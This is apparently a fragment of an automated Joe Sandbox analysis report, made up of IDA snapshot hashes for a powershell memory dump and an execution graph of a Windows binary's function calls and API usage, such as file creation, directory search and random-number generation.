                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd99360000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 03cdb763ef914d561052020f5cc6627aef6787d567b4502f446f0d8bc4e73e1a
                                                                                                                                                                                                                                                                • Instruction ID: 2647936d5d95ec6a4b2814f9ee440a6675a89b1eaafbb6475416343bde90cf3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03cdb763ef914d561052020f5cc6627aef6787d567b4502f446f0d8bc4e73e1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D861E431E09A4C8FDB55EFACD8A55ACBBF1EF5A314F14416ED049D7292CA35A802CB41
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1903750455.00007FFD99360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99360000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd99360000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                • Instruction ID: bfe8b3f28c6fd669a1ec3b7178ff450bbb5c1d330914ea5a3b3e3021fa1e36ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8401A73021CB0C4FD744EF0CE051AA5B7E0FB85324F10056DE58AC3695D636E881CB46
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1903750455.00007FFD99360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99360000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd99360000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c3d97c3b762e8d4dcababb34a315cf183926154f90eeb493eb2fa7bb84208684
                                                                                                                                                                                                                                                                • Instruction ID: 683bb62e81558e649150ed88c838364db13591850f8bb2237a129a21c3a6738f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3d97c3b762e8d4dcababb34a315cf183926154f90eeb493eb2fa7bb84208684
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45F0653275C6048FDB5CAA1CF8529B573D1EB99324B10017EF48BC3697D927F842C686

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:7.9%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                                                                                                                                Total number of Nodes:1236
                                                                                                                                                                                                                                                                Total number of Limit Nodes:40
                                                                                                                                                                                                                                                                execution_graph 38219 7ff623dd3b53 38220 7ff623dd3b64 38219->38220 38270 7ff623df1e80 38220->38270 38221 7ff623dd3c09 38282 7ff623df23f0 38221->38282 38223 7ff623dd3bb6 38223->38221 38224 7ff623dd3c18 38223->38224 38225 7ff623dd3c01 38223->38225 38292 7ff623dd8050 157 API calls 38224->38292 38287 7ff623df1c24 38225->38287 38228 7ff623dd3c3d 38293 7ff623dd8010 13 API calls 38228->38293 38229 7ff623dd3ccc 38251 7ff623dd3c90 38229->38251 38300 7ff623df2414 61 API calls 38229->38300 38232 7ff623dd3c45 38235 7ff623dd3c54 38232->38235 38294 7ff623decba8 75 API calls 38232->38294 38234 7ff623dd3cf9 38301 7ff623df1998 138 API calls 38234->38301 38295 7ff623dda9d4 186 API calls wcschr 38235->38295 38239 7ff623dd3c5c 38296 7ff623dd93ac 8 API calls 38239->38296 38240 7ff623dd3d10 38302 7ff623df18ac 38240->38302 38243 7ff623dd3c66 38245 7ff623dd3c77 38243->38245 38297 7ff623deca40 61 API calls _CxxThrowException 38243->38297 38298 7ff623dd8090 8 API calls 38245->38298 38248 7ff623dd3c7f 38248->38251 38299 7ff623deca40 61 API calls _CxxThrowException 38248->38299 38309 7ff623e1d400 48 API calls 38251->38309 38271 7ff623df1e95 setbuf 38270->38271 38272 7ff623df1ecb CreateFileW 38271->38272 38273 7ff623df1fb8 38272->38273 38274 7ff623df1f59 GetLastError 38272->38274 38275 7ff623df1ff7 38273->38275 38277 7ff623df1fd9 SetFileTime 38273->38277 38310 7ff623e04534 38274->38310 38322 7ff623e2a610 38275->38322 38277->38275 38280 7ff623df1f78 CreateFileW GetLastError 38280->38273 38336 7ff623df24e8 38282->38336 38285 7ff623df240e 38285->38229 38288 7ff623df1c3b 38287->38288 38289 7ff623df1c37 38287->38289 38288->38289 38290 7ff623df1c5d 38288->38290 38289->38221 38353 7ff623df2d6c 12 API calls 2 library calls 38290->38353 38292->38228 38293->38232 38295->38239 38296->38243 38297->38245 38298->38248 38299->38251 38300->38234 38301->38240 38303 7ff623df18ca 38302->38303 38308 7ff623df18db 38302->38308 38304 7ff623df18de 38303->38304 38305 7ff623df18d6 38303->38305 38303->38308 38354 7ff623df1930 38304->38354 38306 7ff623df1c24 12 API calls 38305->38306 38306->38308 38308->38251 38311 7ff623e04549 setbuf 38310->38311 38321 7ff623e045a2 38311->38321 38331 7ff623e0472c CharUpperW 38311->38331 38313 7ff623e04579 38332 7ff623e04760 CharUpperW 38313->38332 38314 7ff623e2a610 _handle_error 8 API calls 38315 7ff623df1f74 38314->38315 38315->38273 38315->38280 38317 7ff623e04592 38318 7ff623e0459a 38317->38318 38319 7ff623e04629 GetCurrentDirectoryW 38317->38319 38333 7ff623e0472c CharUpperW 38318->38333 38319->38321 38321->38314 38323 7ff623e2a61a 38322->38323 38324 7ff623df203a 38323->38324 38325 7ff623e2a6a0 IsProcessorFeaturePresent 38323->38325 38324->38223 38326 7ff623e2a6b7 38325->38326 38334 7ff623e2a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38326->38334 38328 7ff623e2a6ca 38335 7ff623e2a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38328->38335 38331->38313 38332->38317 38333->38321 38334->38328 38342 7ff623df1af0 38336->38342 38339 7ff623df23f9 38339->38285 38341 7ff623deca40 61 API calls _CxxThrowException 38339->38341 38341->38285 38343 7ff623df1b01 setbuf 38342->38343 38344 7ff623df1b6f CreateFileW 38343->38344 38345 7ff623df1b68 38343->38345 38344->38345 38346 7ff623df1be1 38345->38346 38347 7ff623e04534 10 API calls 38345->38347 38349 7ff623e2a610 _handle_error 8 API calls 38346->38349 38348 7ff623df1bb3 38347->38348 38348->38346 38350 7ff623df1bb7 CreateFileW 38348->38350 38351 7ff623df1c14 38349->38351 38350->38346 38351->38339 38352 7ff623deca08 10 API calls 38351->38352 38352->38339 38353->38289 38355 7ff623df194c 38354->38355 38357 7ff623df1964 38354->38357 38355->38357 38358 7ff623df1958 CloseHandle 38355->38358 38356 7ff623df1988 38356->38308 38357->38356 38360 7ff623dec9d0 10 API calls 38357->38360 38358->38357 38360->38356 38361 7ff623dd1884 38493 7ff623e034e4 38361->38493 38364 7ff623dd1926 38366 7ff623dd195b 38364->38366 38557 7ff623e03f98 63 API calls 2 library calls 38364->38557 38365 7ff623e034e4 CompareStringW 38367 7ff623dd18a6 38365->38367 38374 7ff623dd1970 38366->38374 38558 7ff623df2ed8 100 API calls 3 library calls 38366->38558 38368 7ff623e034e4 CompareStringW 38367->38368 38373 7ff623dd18b9 38367->38373 38368->38373 38372 7ff623dd1915 38556 7ff623deca40 61 API calls _CxxThrowException 38372->38556 38373->38364 38555 7ff623dd1168 8 API calls 2 library calls 38373->38555 38376 7ff623dd19b8 38374->38376 38559 7ff623e149f4 48 API calls 38374->38559 38497 7ff623dd5450 38376->38497 38378 7ff623dd19b0 38560 7ff623de8444 54 API calls fflush 38378->38560 38384 7ff623dd72c4 76 API calls 38391 7ff623dd1a12 38384->38391 38385 7ff623dd1b04 38535 7ff623de6c94 38385->38535 38386 7ff623dd1ae6 38531 7ff623dd7514 38386->38531 38389 7ff623dd1af2 38390 7ff623dd7514 72 API calls 38389->38390 38392 7ff623dd1aff 38390->38392 38391->38385 38391->38386 38393 7ff623e2a610 _handle_error 8 API calls 38392->38393 38394 7ff623dd2f97 38393->38394 38395 7ff623dd1b13 38551 7ff623dd7148 38395->38551 38397 7ff623dd1c71 38398 7ff623dd1ca7 38397->38398 38399 7ff623dd63e8 8 API calls 38397->38399 38400 7ff623dd1ce4 38398->38400 38401 7ff623dd1cd5 38398->38401 38402 7ff623dd1c91 38399->38402 38404 7ff623e2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38400->38404 38403 7ff623e2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38401->38403 38405 7ff623dd49b8 99 API calls 38402->38405 38408 7ff623dd1cee 38403->38408 38404->38408 38406 7ff623dd1c9d 38405->38406 38407 7ff623dd63e8 8 API calls 38406->38407 38407->38398 38409 7ff623dd1d50 38408->38409 38411 7ff623e1de30 72 API calls 38408->38411 38410 7ff623e2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38409->38410 38412 7ff623dd1d62 38410->38412 38411->38409 38413 7ff623e1dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38412->38413 38414 7ff623dd1d7b 38412->38414 38413->38414 38415 7ff623e22bcc 66 API calls 38414->38415 38416 7ff623dd1dba 38415->38416 38489 7ff623dfae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38416->38489 38417 7ff623dd1e1c 38419 7ff623dd10c0 8 API calls 38417->38419 38421 7ff623dd1e5d 38417->38421 38418 7ff623dd1dde std::bad_alloc::bad_alloc 38418->38417 38420 7ff623e2ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38418->38420 38419->38421 38420->38417 38422 7ff623dda410 159 API calls 38421->38422 38457 7ff623dd1ef4 38421->38457 38422->38457 38423 7ff623dd2ccc 38424 7ff623dd2d0c 38423->38424 38488 7ff623df8c80 72 API calls 38423->38488 38425 7ff623e1de30 72 API calls 38424->38425 38431 7ff623dd2d21 38424->38431 38425->38431 38426 7ff623df6688 48 API calls 38426->38457 38427 7ff623dd2d86 38433 7ff623e149f4 48 API calls 38427->38433 38459 7ff623dd2dd0 38427->38459 38428 7ff623e1b6d0 73 API calls 38461 7ff623dd2005 38428->38461 38429 7ff623dd5e70 169 API calls 38429->38461 38430 7ff623dda410 159 API calls 38430->38457 38431->38427 38435 7ff623e149f4 48 API calls 38431->38435 38432 7ff623dda504 208 API calls 38432->38459 38438 7ff623dd2d9e 38433->38438 38434 7ff623dd80e4 192 API calls 38434->38459 38439 7ff623dd2d6c 38435->38439 38436 7ff623dd5928 237 API calls 38436->38461 38437 7ff623dde6c8 157 API calls 38437->38457 38440 7ff623de8444 54 API calls 38438->38440 38442 7ff623e149f4 48 API calls 38439->38442 38443 7ff623dd2da6 38440->38443 38441 7ff623df7c7c 127 API calls 38441->38459 38446 7ff623dd2d79 38442->38446 38449 7ff623df1c24 12 API calls 38443->38449 38444 7ff623dd1168 8 API calls 38444->38459 38445 7ff623ddb540 147 API calls 38445->38457 38448 7ff623de8444 54 API calls 38446->38448 38447 7ff623dee21c 63 API calls 38447->38461 38448->38427 38449->38459 38450 7ff623df65b4 48 API calls 38450->38457 38451 7ff623e1ae50 71 API calls 38456 7ff623dd2e39 38451->38456 38452 7ff623df4554 16 API calls 38452->38457 38453 7ff623df1998 138 API calls 38453->38457 38454 7ff623dd33b4 64 API calls 38454->38459 38455 7ff623dd5db4 46 API calls 38455->38457 38456->38451 38458 7ff623deca40 61 API calls 38456->38458 38456->38459 38457->38423 38457->38426 38457->38430 38457->38437 38457->38445 38457->38450 38457->38452 38457->38453 38457->38455 38460 7ff623df1e80 15 API calls 38457->38460 38457->38461 38465 7ff623df7c7c 127 API calls 38457->38465 38466 7ff623df1930 11 API calls 38457->38466 38469 7ff623dd5004 49 API calls 38457->38469 38471 7ff623dda4d0 12 API calls 38457->38471 38472 7ff623df18ac 15 API calls 38457->38472 38473 7ff623dd1168 8 API calls 38457->38473 38474 7ff623dd571c 12 API calls 38457->38474 38475 7ff623e1d48c 58 API calls 38457->38475 38476 7ff623dd5e70 169 API calls 38457->38476 38477 7ff623e1c0a8 10 API calls 38457->38477 38478 7ff623de9be0 14 API calls 38457->38478 38479 7ff623df6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38457->38479 38480 7ff623e097f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38457->38480 38481 7ff623decbd0 75 API calls 38457->38481 38482 7ff623df5c0c 237 API calls 38457->38482 38483 7ff623df5d40 237 API calls 38457->38483 38484 7ff623dd6114 216 API calls 38457->38484 38486 7ff623df5708 237 API calls 38457->38486 38490 7ff623dfa250 237 API calls 38457->38490 38491 7ff623dfaae0 237 API calls 38457->38491 38492 7ff623de0d60 237 API calls 38457->38492 38458->38459 38459->38432 38459->38434 38459->38441 38459->38444 38459->38454 38459->38456 38462 7ff623dd6188 231 API calls 38459->38462 38463 7ff623dd3f74 138 API calls 38459->38463 38467 7ff623e0ba9c 195 API calls 38459->38467 38468 7ff623e149f4 48 API calls 38459->38468 38470 7ff623de8444 54 API calls 38459->38470 38460->38457 38461->38428 38461->38429 38461->38436 38461->38447 38461->38457 38464 7ff623ddb540 147 API calls 38461->38464 38485 7ff623e149f4 48 API calls 38461->38485 38487 7ff623de8444 54 API calls 38461->38487 38462->38459 38463->38459 38464->38461 38465->38457 38466->38457 38467->38459 38468->38459 38469->38457 38470->38459 38471->38457 38472->38457 38473->38457 38474->38457 38475->38457 38476->38457 38477->38457 38478->38457 38479->38457 38480->38457 38481->38457 38482->38457 38483->38457 38484->38457 38485->38461 38486->38457 38487->38461 38488->38424 38489->38418 38490->38457 38491->38461 38492->38461 38494 7ff623e034f6 38493->38494 38496 7ff623dd1893 38494->38496 38561 7ff623e1dac0 CompareStringW 38494->38561 38496->38365 38496->38373 38500 7ff623dd546f setbuf 38497->38500 38498 7ff623dd554a __scrt_fastfail 38602 7ff623e1c0a8 GetSystemTime SystemTimeToFileTime 38498->38602 38500->38498 38515 7ff623dd5588 __scrt_fastfail 38500->38515 38505 7ff623dd681c 54 API calls 38507 7ff623dd5583 38505->38507 38506 7ff623dd56e9 38598 7ff623e16f68 38506->38598 38591 7ff623dd6eb8 38507->38591 38509 7ff623dd56f6 38510 7ff623e2a610 _handle_error 8 API calls 38509->38510 38511 7ff623dd19df 38510->38511 38517 7ff623dd72c4 38511->38517 38515->38507 38562 7ff623dd3210 38515->38562 38568 7ff623de7088 38515->38568 38572 7ff623dd681c 38515->38572 38583 7ff623e17a24 38515->38583 38605 7ff623dd571c 38515->38605 38613 7ff623de4380 14 API calls 38515->38613 38518 7ff623dd72eb 38517->38518 38729 7ff623de88dc 38518->38729 38520 7ff623dd7302 38733 7ff623e0915c 38520->38733 38522 7ff623dd730f 38745 7ff623e07044 38522->38745 38525 7ff623e2a444 new 4 API calls 38526 7ff623dd73e3 38525->38526 38528 7ff623dd73f5 __scrt_fastfail 38526->38528 38761 7ff623df894c 38526->38761 38750 7ff623de9be0 38528->38750 38532 7ff623dd7539 38531->38532 38854 7ff623e0922c 38532->38854 38536 7ff623de6cbc 38535->38536 38541 7ff623de6d45 38535->38541 38539 7ff623de6cd9 38536->38539 38865 7ff623e09f78 8 API calls 2 library calls 38536->38865 38537 7ff623de6d83 38537->38395 38545 7ff623de6cf3 38539->38545 38866 7ff623e09f78 8 API calls 2 library calls 38539->38866 38540 7ff623de6d69 38540->38537 38871 7ff623e09f78 8 API calls 2 library calls 38540->38871 38541->38537 38541->38540 38870 7ff623e09f78 8 API calls 2 library calls 38541->38870 38544 7ff623de6d0d 38548 7ff623de6d2b 38544->38548 38868 7ff623e09f78 8 API calls 2 library calls 38544->38868 38545->38544 38867 7ff623e09f78 8 API calls 2 library calls 38545->38867 38548->38537 38869 7ff623e09f78 8 API calls 2 library calls 38548->38869 38552 7ff623dd7162 38551->38552 38553 7ff623dd7167 38551->38553 38872 7ff623dd6c64 130 API calls _handle_error 38552->38872 38555->38372 38556->38364 38557->38366 38558->38374 38559->38378 38560->38376 38561->38496 38563 7ff623dd32e9 38562->38563 38564 7ff623dd3231 38562->38564 38563->38515 38564->38563 38614 7ff623de4380 14 API calls 38564->38614 38566 7ff623dd329c 38566->38563 38615 7ff623df2a20 22 API calls 2 library calls 38566->38615 38569 7ff623de70a4 38568->38569 38570 7ff623de70c5 38569->38570 38616 7ff623df8558 10 API calls 2 library calls 38569->38616 38570->38515 38617 7ff623dd6714 38572->38617 38574 7ff623dd6836 38575 7ff623dd6853 38574->38575 38628 7ff623e348c0 31 API calls _invalid_parameter_noinfo 38574->38628 38575->38515 38577 7ff623dd684b 38577->38575 38578 7ff623dd68a9 std::bad_alloc::bad_alloc 38577->38578 38629 7ff623e2ba34 RtlPcToFileHeader RaiseException 38578->38629 38580 7ff623dd68c4 38630 7ff623dd7188 12 API calls 38580->38630 38582 7ff623dd68eb 38582->38515 38588 7ff623e17a4f 38583->38588 38589 7ff623e17a59 38583->38589 38584 7ff623e17a7c 38667 7ff623e1b6d0 73 API calls _Init_thread_footer 38584->38667 38587 7ff623e17b1c 60 API calls 38587->38589 38588->38515 38589->38584 38589->38587 38589->38588 38635 7ff623e171fc 38589->38635 38668 7ff623de41b0 14 API calls 2 library calls 38589->38668 38592 7ff623dd6f5c 38591->38592 38593 7ff623dd6ee6 38591->38593 38592->38506 38718 7ff623e19f64 8 API calls __BuildCatchObjectHelper 38593->38718 38595 7ff623dd6efb 38595->38592 38596 7ff623dd6f2f 38595->38596 38596->38595 38719 7ff623dd7188 12 API calls 38596->38719 38599 7ff623e16f8a 38598->38599 38600 7ff623e16fb4 38598->38600 38599->38600 38601 7ff623df4538 FindClose 38599->38601 38601->38599 38603 7ff623e2a610 _handle_error 8 API calls 38602->38603 38604 7ff623dd5576 38603->38604 38604->38505 38606 7ff623dd5742 38605->38606 38610 7ff623dd575d 38605->38610 38606->38610 38724 7ff623e03520 12 API calls 2 library calls 38606->38724 38720 7ff623e03610 38610->38720 38611 7ff623dd57fc 38611->38515 38613->38515 38614->38566 38615->38563 38616->38569 38619 7ff623dd6738 38617->38619 38627 7ff623dd67a7 __BuildCatchObjectHelper 38617->38627 38618 7ff623dd6765 38623 7ff623dd67e1 38618->38623 38624 7ff623dd6786 38618->38624 38619->38618 38631 7ff623deca6c 48 API calls 3 library calls 38619->38631 38621 7ff623dd6759 38632 7ff623decb64 8 API calls 38621->38632 38623->38627 38634 7ff623decb64 8 API calls 38623->38634 38624->38627 38633 7ff623decb64 8 API calls 38624->38633 38627->38574 38628->38577 38629->38580 38630->38582 38631->38621 38640 7ff623e17217 setbuf 38635->38640 38636 7ff623e2a610 _handle_error 8 API calls 38638 7ff623e1776f 38636->38638 38638->38589 38650 7ff623e1729c 38640->38650 38659 7ff623e1725a 38640->38659 38661 7ff623e173c5 38640->38661 38676 7ff623df4554 38640->38676 38641 7ff623e17453 38643 7ff623e17476 38641->38643 38644 7ff623e17464 38641->38644 38662 7ff623e17496 38643->38662 38673 7ff623df4538 38643->38673 38690 7ff623e17c38 55 API calls 3 library calls 38644->38690 38647 7ff623e17342 38647->38659 38663 7ff623e17656 38647->38663 38666 7ff623e176ef 38647->38666 38691 7ff623de4380 14 API calls 38647->38691 38648 7ff623e17471 38648->38643 38652 7ff623e173bb 38650->38652 38653 7ff623e1732e 38650->38653 38684 7ff623e2a444 38652->38684 38653->38647 38655 7ff623e1734a 38653->38655 38656 7ff623e1737e 38655->38656 38655->38659 38682 7ff623de4380 14 API calls 38655->38682 38656->38659 38683 7ff623decbd0 75 API calls 38656->38683 38657 7ff623df4554 16 API calls 38657->38659 38659->38636 38669 7ff623df45cc 38661->38669 38662->38657 38662->38659 38663->38659 38663->38663 38664 7ff623e17723 38663->38664 38663->38666 38692 7ff623ddc214 8 API calls 2 library calls 38664->38692 38666->38659 38693 7ff623df8558 10 API calls 2 library calls 38666->38693 38668->38589 38671 7ff623df45ed 38669->38671 38670 7ff623df46ec 15 API calls 38670->38671 38671->38670 38672 7ff623df46b2 38671->38672 38672->38641 38672->38647 38674 7ff623df454f 38673->38674 38675 7ff623df4549 FindClose 38673->38675 38674->38662 38675->38674 38677 7ff623df4570 38676->38677 38678 7ff623df4574 38677->38678 38694 7ff623df46ec 38677->38694 38678->38650 38681 7ff623df458d FindClose 38681->38678 38682->38656 38683->38659 38687 7ff623e2a44f 38684->38687 38685 7ff623e2a47a 38685->38661 38687->38685 38707 7ff623e336c0 38687->38707 38710 7ff623e2b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38687->38710 38711 7ff623e2b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38687->38711 38690->38648 38691->38663 38692->38659 38693->38659 38695 7ff623df4705 setbuf 38694->38695 38696 7ff623df47a4 FindNextFileW 38695->38696 38697 7ff623df4733 FindFirstFileW 38695->38697 38698 7ff623df47ae GetLastError 38696->38698 38706 7ff623df478b 38696->38706 38699 7ff623df4749 38697->38699 38697->38706 38698->38706 38700 7ff623e04534 10 API calls 38699->38700 38701 7ff623df475b 38700->38701 38703 7ff623df475f FindFirstFileW 38701->38703 38704 7ff623df477a GetLastError 38701->38704 38702 7ff623e2a610 _handle_error 8 API calls 38705 7ff623df4587 38702->38705 38703->38704 38703->38706 38704->38706 38705->38678 38705->38681 38706->38702 38712 7ff623e33700 38707->38712 38717 7ff623e36938 EnterCriticalSection 38712->38717 38714 7ff623e3370d 38715 7ff623e36998 abort LeaveCriticalSection 38714->38715 38716 7ff623e336d2 38715->38716 38716->38687 38718->38595 38719->38596 38723 7ff623e03626 setbuf wcschr 38720->38723 38721 7ff623e2a610 _handle_error 8 API calls 38722 7ff623dd57e1 38721->38722 38722->38611 38725 7ff623e048bc 38722->38725 38723->38721 38724->38610 38726 7ff623e048cb setbuf 38725->38726 38727 7ff623e2a610 _handle_error 8 API calls 38726->38727 38728 7ff623e0493a 38727->38728 38728->38611 38730 7ff623de8919 38729->38730 38766 7ff623e14b14 38730->38766 38732 7ff623de8954 __scrt_fastfail 38732->38520 38734 7ff623e09199 38733->38734 38771 7ff623e2a480 38734->38771 38737 7ff623e2a444 new 4 API calls 38738 7ff623e091cf 38737->38738 38739 7ff623e091e1 38738->38739 38740 7ff623de88dc 8 API calls 38738->38740 38741 7ff623e2a444 new 4 API calls 38739->38741 38740->38739 38742 7ff623e091f7 38741->38742 38743 7ff623e09209 38742->38743 38744 7ff623de88dc 8 API calls 38742->38744 38743->38522 38744->38743 38746 7ff623de88dc 8 API calls 38745->38746 38747 7ff623e07063 38746->38747 38779 7ff623e072c0 38747->38779 38783 7ff623de901c CryptAcquireContextW 38750->38783 38754 7ff623de9c2a 38793 7ff623e19ce4 38754->38793 38758 7ff623de9c5b __BuildCatchObjectHelper 38759 7ff623e2a610 _handle_error 8 API calls 38758->38759 38760 7ff623dd1a01 38759->38760 38760->38384 38810 7ff623e17d80 38761->38810 38767 7ff623e14b26 38766->38767 38768 7ff623e14b2b 38766->38768 38770 7ff623e14b38 8 API calls _handle_error 38767->38770 38768->38732 38770->38768 38774 7ff623e2a444 38771->38774 38772 7ff623e091be 38772->38737 38773 7ff623e336c0 new 2 API calls 38773->38774 38774->38772 38774->38773 38777 7ff623e2b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38774->38777 38778 7ff623e2b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38774->38778 38780 7ff623e072dd 38779->38780 38781 7ff623dd7325 38780->38781 38782 7ff623e2a480 4 API calls 38780->38782 38781->38525 38781->38528 38782->38781 38784 7ff623de907e 38783->38784 38785 7ff623de9057 CryptGenRandom CryptReleaseContext 38783->38785 38787 7ff623de9c9c 11 API calls 38784->38787 38785->38784 38786 7ff623de9089 38785->38786 38788 7ff623de9c9c 38786->38788 38787->38786 38789 7ff623e1c0a8 10 API calls 38788->38789 38790 7ff623de9cc5 38789->38790 38803 7ff623e32d74 38790->38803 38794 7ff623de9c49 38793->38794 38795 7ff623e19d15 __BuildCatchObjectHelper 38793->38795 38797 7ff623e19b70 38794->38797 38795->38794 38806 7ff623e19d74 38795->38806 38798 7ff623e19bd9 __scrt_fastfail 38797->38798 38801 7ff623e19bad __scrt_fastfail 38797->38801 38799 7ff623e19d74 8 API calls 38798->38799 38800 7ff623e19c07 38799->38800 38800->38758 38801->38798 38802 7ff623e19d74 8 API calls 38801->38802 38802->38798 38804 7ff623de9cd7 38803->38804 38805 7ff623e32d8b QueryPerformanceCounter 38803->38805 38804->38754 38805->38804 38807 7ff623e19dbc 38806->38807 38807->38807 38808 7ff623e2a610 _handle_error 8 API calls 38807->38808 38809 7ff623e19f40 38808->38809 38809->38795 38817 7ff623e18094 38810->38817 38813 7ff623df8a44 38814 7ff623df8a5a __scrt_fastfail 38813->38814 38849 7ff623e1bac4 38814->38849 38818 7ff623e1809f 38817->38818 38821 7ff623e17ec8 38818->38821 38822 7ff623e17efa __BuildCatchObjectHelper 38821->38822 38828 7ff623e17fb5 38822->38828 38835 7ff623e1b3f0 38822->38835 38825 7ff623e1805c GetCurrentProcessId 38826 7ff623df896e 38825->38826 38826->38813 38827 7ff623e17f7e GetProcAddressForCaller GetProcAddress 38827->38828 38828->38825 38829 7ff623e17ff1 38828->38829 38829->38826 38844 7ff623deca6c 48 API calls 3 library calls 38829->38844 38831 7ff623e1801f 38845 7ff623decda4 10 API calls 2 library calls 38831->38845 38833 7ff623e18027 38846 7ff623deca40 61 API calls _CxxThrowException 38833->38846 38847 7ff623e2a5a0 38835->38847 38838 7ff623e1b428 38842 7ff623e2a610 _handle_error 8 API calls 38838->38842 38839 7ff623e1b42c 38840 7ff623e048bc 8 API calls 38839->38840 38841 7ff623e1b444 LoadLibraryExW 38840->38841 38841->38838 38843 7ff623e17f72 38842->38843 38843->38827 38843->38828 38844->38831 38845->38833 38846->38826 38848 7ff623e1b3fc GetSystemDirectoryW 38847->38848 38848->38838 38848->38839 38852 7ff623e1ba70 GetCurrentProcess GetProcessAffinityMask 38849->38852 38853 7ff623df89c5 38852->38853 38853->38528 38858 7ff623e09245 38854->38858 38856 7ff623e092b1 38863 7ff623df6194 72 API calls 38856->38863 38862 7ff623df6194 72 API calls 38858->38862 38859 7ff623e092bd 38864 7ff623df6194 72 API calls 38859->38864 38861 7ff623e092c9 38862->38856 38863->38859 38864->38861 38865->38539 38866->38545 38867->38544 38868->38548 38869->38541 38870->38540 38871->38537 38872->38553 38873 7ff623e3231c 38874 7ff623e3238c 38873->38874 38875 7ff623e32342 GetModuleHandleW 38873->38875 38886 7ff623e36938 EnterCriticalSection 38874->38886 38875->38874 38881 7ff623e3234f 38875->38881 38877 7ff623e36998 abort LeaveCriticalSection 38878 7ff623e32460 38877->38878 38880 7ff623e3246c 38878->38880 38883 7ff623e32488 11 API calls 38878->38883 38879 7ff623e32396 38884 7ff623e343b8 16 API calls 38879->38884 38885 7ff623e32410 38879->38885 38881->38874 38887 7ff623e324d4 GetModuleHandleExW 38881->38887 38883->38880 38884->38885 38885->38877 38888 7ff623e324fe GetProcAddress 38887->38888 38889 7ff623e32525 38887->38889 38888->38889 38890 7ff623e32518 38888->38890 38891 7ff623e3252f FreeLibrary 38889->38891 38892 7ff623e32535 38889->38892 38890->38889 38891->38892 38892->38874 38893 7ff623e2b0fc 38912 7ff623e2aa8c 38893->38912 38897 7ff623e2b148 38900 7ff623e2b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38897->38900 38920 7ff623e3472c 38897->38920 38898 7ff623e2b123 __scrt_acquire_startup_lock 38898->38897 38968 7ff623e2b52c 7 API calls __scrt_fastfail 38898->38968 38902 7ff623e2b1f7 38900->38902 38911 7ff623e2b16d 38900->38911 38969 7ff623e32574 35 API calls FindHandlerForForeignException 38900->38969 38924 7ff623e33fc4 38902->38924 38909 7ff623e2b220 38970 7ff623e2ac64 8 API calls 2 library calls 38909->38970 38913 7ff623e2aaae __isa_available_init 38912->38913 38971 7ff623e2e2f8 38913->38971 38918 7ff623e2aab7 38918->38898 38967 7ff623e2b52c 7 API calls __scrt_fastfail 38918->38967 38922 7ff623e34744 38920->38922 38921 7ff623e34766 38921->38900 38922->38921 39020 7ff623e2b010 38922->39020 38925 7ff623e2b20c 38924->38925 38926 7ff623e33fd4 38924->38926 38928 7ff623e07e20 38925->38928 39112 7ff623e33c84 38926->39112 39152 7ff623e1b470 GetModuleHandleW 38928->39152 38934 7ff623e07e58 SetErrorMode GetModuleHandleW 38935 7ff623e148cc 21 API calls 38934->38935 38936 7ff623e07e7d 38935->38936 38937 7ff623e13e48 137 API calls 38936->38937 38938 7ff623e07e90 38937->38938 38939 7ff623de3d3c 126 API calls 38938->38939 38940 7ff623e07e9c 38939->38940 38941 7ff623e2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38940->38941 38942 7ff623e07ead 